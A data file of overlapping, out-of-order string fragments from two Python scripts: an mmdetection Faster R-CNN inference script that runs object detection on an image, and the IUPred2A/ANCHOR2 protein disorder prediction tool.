"'/../work_dirs/backplane_voc_20200520_rcnn_r50_fpn_1x_multiscale_kmeans_scorethr0.05_2/latest.pth' model = init_detector(config, checkpoint) my_config.set('classes', model.CLASSES) # print(model) img = path +",
"img) out_file = osp.splitext(img)[0] + \"_result.png\" # show_result_pyplot(img, result, model.CLASSES, score_thr=0.05) show_result(img, result,",
"path + '/test.jpg' if(len(sys.argv) > 1) : img = sys.argv[1] print(img) result =",
"print(img) result = inference_detector(model, img) out_file = osp.splitext(img)[0] + \"_result.png\" # show_result_pyplot(img, result,",
"from myutils import my_config from mmdet.apis.inference import inference_detector, init_detector, show_result_pyplot,show_result import os.path as",
"checkpoint) my_config.set('classes', model.CLASSES) # print(model) img = path + '/test.jpg' if(len(sys.argv) > 1)",
"# config = path + '/../configs/faster_rcnn_r50_fpn_1x.py' # checkpoint = path + '/../work_dirs/faster_rcnn_r50_fpn_1x/latest.pth' config",
"result, model.CLASSES, score_thr=0.05) show_result(img, result, model.CLASSES, out_file=out_file) print(\"out_file:%s\" % out_file) if __name__ ==",
"sys from myutils import my_config from mmdet.apis.inference import inference_detector, init_detector, show_result_pyplot,show_result import os.path",
"checkpoint = path + '/../work_dirs/backplane_voc_20200520_rcnn_r50_fpn_1x_multiscale_kmeans_scorethr0.05_2/latest.pth' model = init_detector(config, checkpoint) my_config.set('classes', model.CLASSES) # print(model)",
"init_detector(config, checkpoint) my_config.set('classes', model.CLASSES) # print(model) img = path + '/test.jpg' if(len(sys.argv) >",
"img = path + '/test.jpg' if(len(sys.argv) > 1) : img = sys.argv[1] print(img)",
"= sys.argv[1] print(img) result = inference_detector(model, img) out_file = osp.splitext(img)[0] + \"_result.png\" #",
"model = init_detector(config, checkpoint) my_config.set('classes', model.CLASSES) # print(model) img = path + '/test.jpg'",
"import inference_detector, init_detector, show_result_pyplot,show_result import os.path as osp from app import * debug",
"model.CLASSES) # print(model) img = path + '/test.jpg' if(len(sys.argv) > 1) : img",
"model.CLASSES, score_thr=0.05) show_result(img, result, model.CLASSES, out_file=out_file) print(\"out_file:%s\" % out_file) if __name__ == '__main__':",
"osp.splitext(img)[0] + \"_result.png\" # show_result_pyplot(img, result, model.CLASSES, score_thr=0.05) show_result(img, result, model.CLASSES, out_file=out_file) print(\"out_file:%s\"",
"+ '/../work_dirs/backplane_voc_20200520_rcnn_r50_fpn_1x_multiscale_kmeans_scorethr0.05_2/latest.pth' model = init_detector(config, checkpoint) my_config.set('classes', model.CLASSES) # print(model) img = path",
"mmdet.apis.inference import inference_detector, init_detector, show_result_pyplot,show_result import os.path as osp from app import *",
"= \"\" with open(\"test_image/standard_result_6411.txt\", \"r\") as f: lines = f.read() return lines def",
"path + '/../work_dirs/backplane_voc_20200520_rcnn_r50_fpn_1x_multiscale_kmeans_scorethr0.05_2/faster_rcnn_r50_fpn_1x_20200614_173610.py' checkpoint = path + '/../work_dirs/backplane_voc_20200520_rcnn_r50_fpn_1x_multiscale_kmeans_scorethr0.05_2/latest.pth' model = init_detector(config, checkpoint) my_config.set('classes',",
"load_result(): lines = \"\" with open(\"test_image/standard_result_6411.txt\", \"r\") as f: lines = f.read() return",
"= path + '/../work_dirs/backplane_voc_20200520_rcnn_r50_fpn_1x_multiscale_kmeans_scorethr0.05_2/faster_rcnn_r50_fpn_1x_20200614_173610.py' checkpoint = path + '/../work_dirs/backplane_voc_20200520_rcnn_r50_fpn_1x_multiscale_kmeans_scorethr0.05_2/latest.pth' model = init_detector(config, checkpoint)",
"lines = f.read() return lines def main(): #detection debug if debug is True:",
"= osp.splitext(img)[0] + \"_result.png\" # show_result_pyplot(img, result, model.CLASSES, score_thr=0.05) show_result(img, result, model.CLASSES, out_file=out_file)",
"main(): #detection debug if debug is True: print(load_result()) return path = sys.path[0] #",
"myutils import my_config from mmdet.apis.inference import inference_detector, init_detector, show_result_pyplot,show_result import os.path as osp",
"from app import * debug = False # only for debug def load_result():",
"config = path + '/../work_dirs/backplane_voc_20200520_rcnn_r50_fpn_1x_multiscale_kmeans_scorethr0.05_2/faster_rcnn_r50_fpn_1x_20200614_173610.py' checkpoint = path + '/../work_dirs/backplane_voc_20200520_rcnn_r50_fpn_1x_multiscale_kmeans_scorethr0.05_2/latest.pth' model = init_detector(config,",
"sys.path[0] # config = path + '/../configs/faster_rcnn_r50_fpn_1x.py' # checkpoint = path + '/../work_dirs/faster_rcnn_r50_fpn_1x/latest.pth'",
"result = inference_detector(model, img) out_file = osp.splitext(img)[0] + \"_result.png\" # show_result_pyplot(img, result, model.CLASSES,",
"#detection debug if debug is True: print(load_result()) return path = sys.path[0] # config",
"debug = False # only for debug def load_result(): lines = \"\" with",
"open(\"test_image/standard_result_6411.txt\", \"r\") as f: lines = f.read() return lines def main(): #detection debug",
"init_detector, show_result_pyplot,show_result import os.path as osp from app import * debug = False",
"my_config.set('classes', model.CLASSES) # print(model) img = path + '/test.jpg' if(len(sys.argv) > 1) :",
"import os.path as osp from app import * debug = False # only",
"True: print(load_result()) return path = sys.path[0] # config = path + '/../configs/faster_rcnn_r50_fpn_1x.py' #",
"= path + '/../configs/faster_rcnn_r50_fpn_1x.py' # checkpoint = path + '/../work_dirs/faster_rcnn_r50_fpn_1x/latest.pth' config = path",
"import * debug = False # only for debug def load_result(): lines =",
"path + '/../configs/faster_rcnn_r50_fpn_1x.py' # checkpoint = path + '/../work_dirs/faster_rcnn_r50_fpn_1x/latest.pth' config = path +",
"path + '/../work_dirs/faster_rcnn_r50_fpn_1x/latest.pth' config = path + '/../work_dirs/backplane_voc_20200520_rcnn_r50_fpn_1x_multiscale_kmeans_scorethr0.05_2/faster_rcnn_r50_fpn_1x_20200614_173610.py' checkpoint = path + '/../work_dirs/backplane_voc_20200520_rcnn_r50_fpn_1x_multiscale_kmeans_scorethr0.05_2/latest.pth'",
"app import * debug = False # only for debug def load_result(): lines",
"show_result_pyplot(img, result, model.CLASSES, score_thr=0.05) show_result(img, result, model.CLASSES, out_file=out_file) print(\"out_file:%s\" % out_file) if __name__",
"\"_result.png\" # show_result_pyplot(img, result, model.CLASSES, score_thr=0.05) show_result(img, result, model.CLASSES, out_file=out_file) print(\"out_file:%s\" % out_file)",
"out_file = osp.splitext(img)[0] + \"_result.png\" # show_result_pyplot(img, result, model.CLASSES, score_thr=0.05) show_result(img, result, model.CLASSES,",
"f.read() return lines def main(): #detection debug if debug is True: print(load_result()) return",
"import my_config from mmdet.apis.inference import inference_detector, init_detector, show_result_pyplot,show_result import os.path as osp from",
"\"r\") as f: lines = f.read() return lines def main(): #detection debug if",
"show_result_pyplot,show_result import os.path as osp from app import * debug = False #",
"lines def main(): #detection debug if debug is True: print(load_result()) return path =",
"config = path + '/../configs/faster_rcnn_r50_fpn_1x.py' # checkpoint = path + '/../work_dirs/faster_rcnn_r50_fpn_1x/latest.pth' config =",
"path = sys.path[0] # config = path + '/../configs/faster_rcnn_r50_fpn_1x.py' # checkpoint = path",
"debug if debug is True: print(load_result()) return path = sys.path[0] # config =",
"# print(model) img = path + '/test.jpg' if(len(sys.argv) > 1) : img =",
"+ '/test.jpg' if(len(sys.argv) > 1) : img = sys.argv[1] print(img) result = inference_detector(model,",
"debug is True: print(load_result()) return path = sys.path[0] # config = path +",
"print(model) img = path + '/test.jpg' if(len(sys.argv) > 1) : img = sys.argv[1]",
"debug def load_result(): lines = \"\" with open(\"test_image/standard_result_6411.txt\", \"r\") as f: lines =",
"<reponame>wsx66848/tsd import sys from myutils import my_config from mmdet.apis.inference import inference_detector, init_detector, show_result_pyplot,show_result",
"= False # only for debug def load_result(): lines = \"\" with open(\"test_image/standard_result_6411.txt\",",
"= path + '/../work_dirs/backplane_voc_20200520_rcnn_r50_fpn_1x_multiscale_kmeans_scorethr0.05_2/latest.pth' model = init_detector(config, checkpoint) my_config.set('classes', model.CLASSES) # print(model) img",
"only for debug def load_result(): lines = \"\" with open(\"test_image/standard_result_6411.txt\", \"r\") as f:",
"inference_detector, init_detector, show_result_pyplot,show_result import os.path as osp from app import * debug =",
"= path + '/test.jpg' if(len(sys.argv) > 1) : img = sys.argv[1] print(img) result",
"'/../configs/faster_rcnn_r50_fpn_1x.py' # checkpoint = path + '/../work_dirs/faster_rcnn_r50_fpn_1x/latest.pth' config = path + '/../work_dirs/backplane_voc_20200520_rcnn_r50_fpn_1x_multiscale_kmeans_scorethr0.05_2/faster_rcnn_r50_fpn_1x_20200614_173610.py' checkpoint",
"# checkpoint = path + '/../work_dirs/faster_rcnn_r50_fpn_1x/latest.pth' config = path + '/../work_dirs/backplane_voc_20200520_rcnn_r50_fpn_1x_multiscale_kmeans_scorethr0.05_2/faster_rcnn_r50_fpn_1x_20200614_173610.py' checkpoint =",
"'/test.jpg' if(len(sys.argv) > 1) : img = sys.argv[1] print(img) result = inference_detector(model, img)",
"= f.read() return lines def main(): #detection debug if debug is True: print(load_result())",
"is True: print(load_result()) return path = sys.path[0] # config = path + '/../configs/faster_rcnn_r50_fpn_1x.py'",
"my_config from mmdet.apis.inference import inference_detector, init_detector, show_result_pyplot,show_result import os.path as osp from app",
"as f: lines = f.read() return lines def main(): #detection debug if debug",
"'/../work_dirs/faster_rcnn_r50_fpn_1x/latest.pth' config = path + '/../work_dirs/backplane_voc_20200520_rcnn_r50_fpn_1x_multiscale_kmeans_scorethr0.05_2/faster_rcnn_r50_fpn_1x_20200614_173610.py' checkpoint = path + '/../work_dirs/backplane_voc_20200520_rcnn_r50_fpn_1x_multiscale_kmeans_scorethr0.05_2/latest.pth' model =",
"\"\" with open(\"test_image/standard_result_6411.txt\", \"r\") as f: lines = f.read() return lines def main():",
"os.path as osp from app import * debug = False # only for",
"+ '/../configs/faster_rcnn_r50_fpn_1x.py' # checkpoint = path + '/../work_dirs/faster_rcnn_r50_fpn_1x/latest.pth' config = path + '/../work_dirs/backplane_voc_20200520_rcnn_r50_fpn_1x_multiscale_kmeans_scorethr0.05_2/faster_rcnn_r50_fpn_1x_20200614_173610.py'",
"return lines def main(): #detection debug if debug is True: print(load_result()) return path",
"from mmdet.apis.inference import inference_detector, init_detector, show_result_pyplot,show_result import os.path as osp from app import",
"= init_detector(config, checkpoint) my_config.set('classes', model.CLASSES) # print(model) img = path + '/test.jpg' if(len(sys.argv)",
"path + '/../work_dirs/backplane_voc_20200520_rcnn_r50_fpn_1x_multiscale_kmeans_scorethr0.05_2/latest.pth' model = init_detector(config, checkpoint) my_config.set('classes', model.CLASSES) # print(model) img =",
"as osp from app import * debug = False # only for debug",
"+ '/../work_dirs/faster_rcnn_r50_fpn_1x/latest.pth' config = path + '/../work_dirs/backplane_voc_20200520_rcnn_r50_fpn_1x_multiscale_kmeans_scorethr0.05_2/faster_rcnn_r50_fpn_1x_20200614_173610.py' checkpoint = path + '/../work_dirs/backplane_voc_20200520_rcnn_r50_fpn_1x_multiscale_kmeans_scorethr0.05_2/latest.pth' model",
"# only for debug def load_result(): lines = \"\" with open(\"test_image/standard_result_6411.txt\", \"r\") as",
"if debug is True: print(load_result()) return path = sys.path[0] # config = path"
] |
[
"float(_line.split()[1]) if float(_line.split()[1]) > h_max: h_max = float(_line.split()[1]) hist.append(float(_line.split()[-1])) h_step = (h_max -",
"sequence file not found at {}!\\n{}'.format(sys.argv[-2], help_msg)) if not os.path.isdir(PATH): sys.exit('Data directory not",
"iupred_limit = par_c - (par_a / par_b) mtx = read_matrix('{}/data/anchor2_energy_matrix'.format(PATH)) interface_comp = {}",
"help_msg)) if '-d' in sys.argv: PATH = sys.argv[sys.argv.index('-d') + 1] if not os.path.isdir(os.path.join(PATH,",
"< h_min: h_min = float(_line.split()[1]) if float(_line.split()[1]) > h_max: h_max = float(_line.split()[1]) hist.append(float(_line.split()[-1]))",
"1 uc = 100 wc = 10 mtx = read_matrix(\"{}/data/iupred2_long_energy_matrix\".format(PATH)) histo, histo_min, histo_max,",
"print(f\">{sequence.id}\") iupred2_result = iupred(sequence, sys.argv[-1]) if '-a' in sys.argv: if sys.argv[-1] == 'long':",
"+ 1)]) return weighted_energy_score def read_seq(fasta_file): _seq = \"\" with open(fasta_file) as file_handler:",
"= aa_freq(seq[max(0, idx - local_window_size):max(0, idx - 1)] + seq[idx + 2:idx +",
"* (energy_gain[idx] + corr - par_b) * (iupred_scores[idx] - par_c) anchor_score[idx] = 1",
"range(len(energy_list)): weighted_energy_score[idx] = avg(energy_list[max(0, idx - window):min(len(energy_list), idx + window + 1)]) return",
"nr: if kk < nr and gr[kk][0] - end < 45: beg =",
"range(len(seq)): sign = 1 if energy_gain[idx] < par_b and iupred_scores[idx] < par_c: sign",
"if gr: beg = gr[0][0] end = gr[0][1] nr = len(gr) while k",
"_line in file_handler: if _line.startswith(\">\"): continue _seq += _line.strip() return _seq def iupred(seq,",
"= 0.43 iupred_limit = par_c - (par_a / par_b) mtx = read_matrix('{}/data/anchor2_energy_matrix'.format(PATH)) interface_comp",
"smooth(iupred_scores, iupred_window_size) energy_gain = smooth(smooth(energy_gain, local_smoothing_window), local_smoothing_window) anchor_score = [0] * len(seq) for",
"in sys.argv: if sys.argv[-1] == 'long': anchor2_res = anchor2(sequence, iupred2_result[0]) else: anchor2_res =",
"end = gr[0][1] nr = len(gr) while k < nr: if kk <",
"= float(\"inf\") h_max = -float(\"inf\") with open(histo_file, \"r\") as fnh: for _line in",
"mtx[seq[idx]][aa] * freq except KeyError: unweighted_energy_score[idx] += 0 if mode == 'short': for",
"+ par_b anchor_score[idx] = sign * (energy_gain[idx] + corr - par_b) * (iupred_scores[idx]",
"= 1 uc = 100 wc = 10 mtx = read_matrix(\"{}/data/iupred2_long_energy_matrix\".format(PATH)) histo, histo_min,",
"+= 0 for aa, freq in interface_comp.items(): try: interface_energy_score[idx] += mtx[seq[idx]][aa] * freq",
"1 < 35: k += 1 if k < nr: beg = gr[k][0]",
"sequences = SeqIO.parse(sys.argv[-2], \"fasta\") for sequence in sequences: # Print individual sequence identifier",
"for _line in file_handler: if _line.startswith(\">\"): continue _seq += _line.strip() return _seq def",
"+= mtx[seq[idx]][aa] * freq except KeyError: interface_energy_score[idx] += 0 energy_gain[idx] = local_energy_score[idx] -",
"1 uc = 25 wc = 10 mtx = read_matrix(\"{}/data/iupred2_short_energy_matrix\".format(PATH)) histo, histo_min, histo_max,",
"else: weighted_energy_score[idx] += unweighted_energy_score[idx2] weighted_energy_score[idx] /= len(range(idx - wc, idx + wc +",
"except KeyError: local_energy_score[idx] += 0 for aa, freq in interface_comp.items(): try: interface_energy_score[idx] +=",
"for idx, val in enumerate(weighted_energy_score): if val <= histo_min + 2 * histo_step:",
"{} _mtx[_line.split()[0]][_line.split()[1]] = float(_line.split()[2]) return _mtx def read_histo(histo_file): hist = [] h_min =",
"end - beg + 1 < 35: k += 1 if k <",
"if not os.path.isfile(sys.argv[-2]): sys.exit('Input sequence file not found at {}!\\n{}'.format(sys.argv[-2], help_msg)) if not",
"sign = -1 corr = 0 if iupred_scores[idx] > iupred_limit and energy_gain[idx] <",
"#!/usr/bin/env python3 import sys import textwrap import math import os from Bio import",
"float(_line.split()[1]) hist.append(float(_line.split()[-1])) h_step = (h_max - h_min) / (len(hist)) return hist, h_min, h_max,",
"continue _seq += _line.strip() return _seq def iupred(seq, mode): if mode == \"short\":",
"_line in fnh: if _line.startswith(\"#\"): continue if float(_line.split()[1]) < h_min: h_min = float(_line.split()[1])",
"import sys import textwrap import math import os from Bio import SeqIO def",
"output\"\"\".format(sys.argv[-1])) # Add SeqIO parser to support multiple sequences analysis simultaneously sequences =",
"\"\" with open(fasta_file) as file_handler: for _line in file_handler: if _line.startswith(\">\"): continue _seq",
"+= mtx[seq[idx]][aa] * freq except KeyError: local_energy_score[idx] += 0 for aa, freq in",
"45: beg = gr[k][0] end = gr[kk][1] kk += 1 elif end -",
"directory not found at {}!\\n{}'.format(PATH, help_msg)) if sys.argv[-1] not in ['short', 'long', 'glob']:",
"os.path.isdir(PATH): sys.exit('Data directory not found at {}!\\n{}'.format(PATH, help_msg)) if '-d' in sys.argv: PATH",
"/ (1 + math.e ** (-22.97968 * (anchor_score[idx] - 0.0116))) return anchor_score PATH",
"with open(fasta_file) as file_handler: for _line in file_handler: if _line.startswith(\">\"): continue _seq +=",
"anchor2(sequence, iupred2_result[0]) else: anchor2_res = anchor2(sequence, iupred(sequence, 'long')[0]) if sys.argv[-1] == 'glob': print(iupred2_result[1])",
"glob_text = \"\" if mode == 'glob': gr = [] in_gr = False",
"k < nr: if kk < nr and gr[kk][0] - end < 45:",
"= float(_line.split()[2]) else: _mtx[_line.split()[0]] = {} _mtx[_line.split()[0]][_line.split()[1]] = float(_line.split()[2]) return _mtx def read_histo(histo_file):",
"= -float(\"inf\") with open(histo_file, \"r\") as fnh: for _line in fnh: if _line.startswith(\"#\"):",
"end += 1 if val > 0.3 and not in_gr: beg = idx",
"par_c: sign = -1 corr = 0 if iupred_scores[idx] > iupred_limit and energy_gain[idx]",
"corr = (par_a / (iupred_scores[idx] - par_c)) + par_b anchor_score[idx] = sign *",
"= (par_a / (iupred_scores[idx] - par_c)) + par_b anchor_score[idx] = sign * (energy_gain[idx]",
"aa, freq in freq_dct.items(): try: unweighted_energy_score[idx] += mtx[seq[idx]][aa] * freq except KeyError: unweighted_energy_score[idx]",
"= -1 corr = 0 if iupred_scores[idx] > iupred_limit and energy_gain[idx] < 0:",
"a function of redox state and protein binding # <NAME>, <NAME>, <NAME> #",
"* len(seq) iupred_score = [0] * len(seq) for idx in range(len(seq)): freq_dct =",
"= iupred(sequence, sys.argv[-1]) if '-a' in sys.argv: if sys.argv[-1] == 'long': anchor2_res =",
"float(\"inf\") h_max = -float(\"inf\") with open(histo_file, \"r\") as fnh: for _line in fnh:",
"1 if val > 0.3 and not in_gr: beg = idx end =",
"energy_gain[idx] < par_b and iupred_scores[idx] < par_c: sign = -1 corr = 0",
"'long', 'glob']: sys.exit('Wrong iupred2 option {}!\\n{}'.format(sys.argv[-1], help_msg)) # Print output message with run",
"hist.append(float(_line.split()[-1])) h_step = (h_max - h_min) / (len(hist)) return hist, h_min, h_max, h_step",
"iupred_window_size) energy_gain = smooth(smooth(energy_gain, local_smoothing_window), local_smoothing_window) anchor_score = [0] * len(seq) for idx",
"if in_gr: gr.append({0: beg, 1: end}) mgr = [] k = 0 kk",
"iupred2_result = iupred(sequence, sys.argv[-1]) if '-a' in sys.argv: if sys.argv[-1] == 'long': anchor2_res",
"read_matrix(\"{}/data/iupred2_long_energy_matrix\".format(PATH)) histo, histo_min, histo_max, histo_step = read_histo(\"{}/data/long_histogram\".format(PATH)) else: lc = 1 uc =",
"= anchor2(sequence, iupred(sequence, 'long')[0]) if sys.argv[-1] == 'glob': print(iupred2_result[1]) if '-a' in sys.argv:",
"uc = 100 wc = 15 mtx = read_matrix(\"{}/data/iupred2_long_energy_matrix\".format(PATH)) histo, histo_min, histo_max, histo_step",
"import SeqIO def avg(lst): return sum(lst) / len(lst) def aa_freq(_seq): _freq = {}",
"in _seq: if _aa in _freq: _freq[_aa] += 1 else: _freq[_aa] = 1",
"Print output message with run parameters print(\"\"\"# IUPred2A: context-dependent prediction of protein disorder",
"if sys.argv[-1] not in ['short', 'long', 'glob']: sys.exit('Wrong iupred2 option {}!\\n{}'.format(sys.argv[-1], help_msg)) #",
"2018;46(W1):W329-W337. # # Prediction type: {} # Prediction output\"\"\".format(sys.argv[-1])) # Add SeqIO parser",
"open('{}/data/anchor2_interface_comp'.format(PATH)) as _fn: for line in _fn: interface_comp[line.split()[1]] = float(line.split()[2]) local_energy_score = [0]",
"def read_histo(histo_file): hist = [] h_min = float(\"inf\") h_max = -float(\"inf\") with open(histo_file,",
"+ corr - par_b) * (iupred_scores[idx] - par_c) anchor_score[idx] = 1 / (1",
"in enumerate(sequence): print('{}\\t{}\\t{:.4f}'.format(pos + 1, residue, iupred2_result[0][pos]), end=\"\") if '-a' in sys.argv: print(\"\\t{:.4f}\".format(anchor2_res[pos]),",
"and val <= 0.3: gr.append({0: beg, 1: end}) in_gr = False elif in_gr:",
"<gh_stars>0 #!/usr/bin/env python3 import sys import textwrap import math import os from Bio",
"+= 1 if k < nr: beg = gr[k][0] end = gr[k][1] else:",
"+= \"Number of globular domains: {}\\n\".format(len(mgr)) for n, i in enumerate(mgr): glob_text +=",
"anchor_score = [0] * len(seq) for idx in range(len(seq)): sign = 1 if",
"# Prediction output\"\"\".format(sys.argv[-1])) # Add SeqIO parser to support multiple sequences analysis simultaneously",
"for posterior parsing print(f\">{sequence.id}\") iupred2_result = iupred(sequence, sys.argv[-1]) if '-a' in sys.argv: if",
"= True if in_gr: gr.append({0: beg, 1: end}) mgr = [] k =",
"= 41 iupred_window_size = 30 local_smoothing_window = 5 par_a = 0.0013 par_b =",
"wc, idx + wc + 1): if idx2 < 0 or idx2 >=",
"\"\" if mode == 'glob': gr = [] in_gr = False beg, end",
"nr = i[1] + 1 res += seq[nr:] res = \" \".join([res[i:i +",
"def smooth(energy_list, window): weighted_energy_score = [0] * len(energy_list) for idx in range(len(energy_list)): weighted_energy_score[idx]",
"PATH = os.path.dirname(os.path.realpath(__file__)) help_msg = \"\"\"Usage: {} (options) (seqfile) (iupred type) \\tAvailable types:",
"interface_energy_score[idx] += mtx[seq[idx]][aa] * freq except KeyError: interface_energy_score[idx] += 0 energy_gain[idx] = local_energy_score[idx]",
"wc + 1): if idx2 < 0 or idx2 >= len(seq): weighted_energy_score[idx] +=",
"type: {} # Prediction output\"\"\".format(sys.argv[-1])) # Add SeqIO parser to support multiple sequences",
"sys.argv[-1] == 'long': anchor2_res = anchor2(sequence, iupred2_result[0]) else: anchor2_res = anchor2(sequence, iupred(sequence, 'long')[0])",
"def avg(lst): return sum(lst) / len(lst) def aa_freq(_seq): _freq = {} for _aa",
"context-dependent prediction of protein disorder as a function of redox state and protein",
"== 'glob': print(iupred2_result[1]) if '-a' in sys.argv: print(\"# POS\\tRES\\tIUPRED2\\tANCHOR2\") else: print(\"# POS\\tRES\\tIUPRED2\") for",
"histo_min + 2 * histo_step: iupred_score[idx] = 1 elif val >= histo_max -",
"iupred_score, glob_text def anchor2(seq, iupred_scores): local_window_size = 41 iupred_window_size = 30 local_smoothing_window =",
"histo_max, histo_step = read_histo(\"{}/data/long_histogram\".format(PATH)) unweighted_energy_score = [0] * len(seq) weighted_energy_score = [0] *",
"70)) for idx, val in enumerate(weighted_energy_score): if val <= histo_min + 2 *",
"/ (iupred_scores[idx] - par_c)) + par_b anchor_score[idx] = sign * (energy_gain[idx] + corr",
"= gr[k][0] end = gr[k][1] seq = seq.lower() nr = 0 res =",
"1] if not os.path.isdir(os.path.join(PATH, 'data')): sys.exit('Data directory not found at {}!\\n{}'.format(PATH, help_msg)) if",
"idx in range(len(seq)): freq_dct = aa_freq(seq[max(0, idx - uc):max(0, idx - lc)] +",
"in enumerate(weighted_energy_score): if val <= histo_min + 2 * histo_step: iupred_score[idx] = 1",
"smooth(unweighted_energy_score, wc) glob_text = \"\" if mode == 'glob': gr = [] in_gr",
"local_energy_score[idx] += mtx[seq[idx]][aa] * freq except KeyError: local_energy_score[idx] += 0 for aa, freq",
"except KeyError: interface_energy_score[idx] += 0 energy_gain[idx] = local_energy_score[idx] - interface_energy_score[idx] iupred_scores = smooth(iupred_scores,",
"anchor2_res = anchor2(sequence, iupred2_result[0]) else: anchor2_res = anchor2(sequence, iupred(sequence, 'long')[0]) if sys.argv[-1] ==",
"with open(histo_file, \"r\") as fnh: for _line in fnh: if _line.startswith(\"#\"): continue if",
"+= 1 else: _freq[_aa] = 1 for _aa, _ins in _freq.items(): _freq[_aa] =",
"file_handler: if _line.startswith(\">\"): continue _seq += _line.strip() return _seq def iupred(seq, mode): if",
"in_gr: gr.append({0: beg, 1: end}) mgr = [] k = 0 kk =",
"with run parameters print(\"\"\"# IUPred2A: context-dependent prediction of protein disorder as a function",
"if float(_line.split()[1]) < h_min: h_min = float(_line.split()[1]) if float(_line.split()[1]) > h_max: h_max =",
"= float(_line.split()[1]) if float(_line.split()[1]) > h_max: h_max = float(_line.split()[1]) hist.append(float(_line.split()[-1])) h_step = (h_max",
"mtx = read_matrix(\"{}/data/iupred2_short_energy_matrix\".format(PATH)) histo, histo_min, histo_max, histo_step = read_histo(\"{}/data/short_histogram\".format(PATH)) elif mode == 'glob':",
"wc) glob_text = \"\" if mode == 'glob': gr = [] in_gr =",
"* len(seq) energy_gain = [0] * len(seq) for idx in range(len(seq)): freq_dct =",
"= gr[k][0] end = gr[kk][1] kk += 1 elif end - beg +",
"0 for aa, freq in interface_comp.items(): try: interface_energy_score[idx] += mtx[seq[idx]][aa] * freq except",
"in interface_comp.items(): try: interface_energy_score[idx] += mtx[seq[idx]][aa] * freq except KeyError: interface_energy_score[idx] += 0",
"local_window_size + 1]) for aa, freq in freq_dct.items(): try: local_energy_score[idx] += mtx[seq[idx]][aa] *",
"_aa, _ins in _freq.items(): _freq[_aa] = _ins / len(_seq) return _freq def read_matrix(matrix_file):",
"run parameters print(\"\"\"# IUPred2A: context-dependent prediction of protein disorder as a function of",
"if '-a' in sys.argv: print(\"# POS\\tRES\\tIUPRED2\\tANCHOR2\") else: print(\"# POS\\tRES\\tIUPRED2\") for pos, residue in",
"end = idx in_gr = True if in_gr: gr.append({0: beg, 1: end}) mgr",
"idx - local_window_size):max(0, idx - 1)] + seq[idx + 2:idx + local_window_size +",
"= smooth(iupred_scores, iupred_window_size) energy_gain = smooth(smooth(energy_gain, local_smoothing_window), local_smoothing_window) anchor_score = [0] * len(seq)",
"for n, i in enumerate(mgr): glob_text += \" globular domain {}.\\t{}-{}\\n\".format(n + 1,",
"# # Prediction type: {} # Prediction output\"\"\".format(sys.argv[-1])) # Add SeqIO parser to",
"else: _freq[_aa] = 1 for _aa, _ins in _freq.items(): _freq[_aa] = _ins /",
"idx2 < 0 or idx2 >= len(seq): weighted_energy_score[idx] += -1.26 else: weighted_energy_score[idx] +=",
"= {} for _aa in _seq: if _aa in _freq: _freq[_aa] += 1",
"1:idx + uc + 1]) for aa, freq in freq_dct.items(): try: unweighted_energy_score[idx] +=",
"10 mtx = read_matrix(\"{}/data/iupred2_long_energy_matrix\".format(PATH)) histo, histo_min, histo_max, histo_step = read_histo(\"{}/data/long_histogram\".format(PATH)) unweighted_energy_score = [0]",
"elif mode == 'glob': lc = 1 uc = 100 wc = 15",
"residue in enumerate(sequence): print('{}\\t{}\\t{:.4f}'.format(pos + 1, residue, iupred2_result[0][pos]), end=\"\") if '-a' in sys.argv:",
"= kk kk += 1 if k < nr: beg = gr[k][0] end",
"(iupred_scores[idx] - par_c)) + par_b anchor_score[idx] = sign * (energy_gain[idx] + corr -",
"enumerate(weighted_energy_score): if val <= histo_min + 2 * histo_step: iupred_score[idx] = 1 elif",
"not found at {}!\\n{}'.format(sys.argv[-2], help_msg)) if not os.path.isdir(PATH): sys.exit('Data directory not found at",
"i in range(0, len(res), 10)]) glob_text += \"Number of globular domains: {}\\n\".format(len(mgr)) for",
"histo_step: iupred_score[idx] = 0 else: iupred_score[idx] = histo[int((weighted_energy_score[idx] - histo_min) * (1 /",
"aa_freq(seq[max(0, idx - local_window_size):max(0, idx - 1)] + seq[idx + 2:idx + local_window_size",
"< par_c: sign = -1 corr = 0 if iupred_scores[idx] > iupred_limit and",
"help_msg)) if sys.argv[-1] not in ['short', 'long', 'glob']: sys.exit('Wrong iupred2 option {}!\\n{}'.format(sys.argv[-1], help_msg))",
"if idx2 < 0 or idx2 >= len(seq): weighted_energy_score[idx] += -1.26 else: weighted_energy_score[idx]",
"_aa in _seq: if _aa in _freq: _freq[_aa] += 1 else: _freq[_aa] =",
"try: local_energy_score[idx] += mtx[seq[idx]][aa] * freq except KeyError: local_energy_score[idx] += 0 for aa,",
"par_b) * (iupred_scores[idx] - par_c) anchor_score[idx] = 1 / (1 + math.e **",
"1 res += seq[nr:] res = \" \".join([res[i:i + 10] for i in",
"mode == 'glob': lc = 1 uc = 100 wc = 15 mtx",
"math import os from Bio import SeqIO def avg(lst): return sum(lst) / len(lst)",
"sys.argv[-1] not in ['short', 'long', 'glob']: sys.exit('Wrong iupred2 option {}!\\n{}'.format(sys.argv[-1], help_msg)) # Print",
"- lc)] + seq[idx + lc + 1:idx + uc + 1]) for",
"float(line.split()[2]) local_energy_score = [0] * len(seq) interface_energy_score = [0] * len(seq) energy_gain =",
"lc + 1:idx + uc + 1]) for aa, freq in freq_dct.items(): try:",
"iupred_score[idx] = histo[int((weighted_energy_score[idx] - histo_min) * (1 / histo_step))] return iupred_score, glob_text def",
"0 for idx, val in enumerate(weighted_energy_score): if in_gr and val <= 0.3: gr.append({0:",
"Enable ANCHOR2 predition\\n\"\"\".format(sys.argv[0]) if len(sys.argv) < 2: sys.exit(help_msg) if not os.path.isfile(sys.argv[-2]): sys.exit('Input sequence",
"beg = gr[0][0] end = gr[0][1] nr = len(gr) while k < nr:",
"for aa, freq in freq_dct.items(): try: unweighted_energy_score[idx] += mtx[seq[idx]][aa] * freq except KeyError:",
"-1.26 else: weighted_energy_score[idx] += unweighted_energy_score[idx2] weighted_energy_score[idx] /= len(range(idx - wc, idx + wc",
"+= unweighted_energy_score[idx2] weighted_energy_score[idx] /= len(range(idx - wc, idx + wc + 1)) else:",
"= read_matrix(\"{}/data/iupred2_long_energy_matrix\".format(PATH)) histo, histo_min, histo_max, histo_step = read_histo(\"{}/data/long_histogram\".format(PATH)) unweighted_energy_score = [0] * len(seq)",
"{}\\n\".format(len(mgr)) for n, i in enumerate(mgr): glob_text += \" globular domain {}.\\t{}-{}\\n\".format(n +",
"/ histo_step))] return iupred_score, glob_text def anchor2(seq, iupred_scores): local_window_size = 41 iupred_window_size =",
"wc, idx + wc + 1)) else: weighted_energy_score = smooth(unweighted_energy_score, wc) glob_text =",
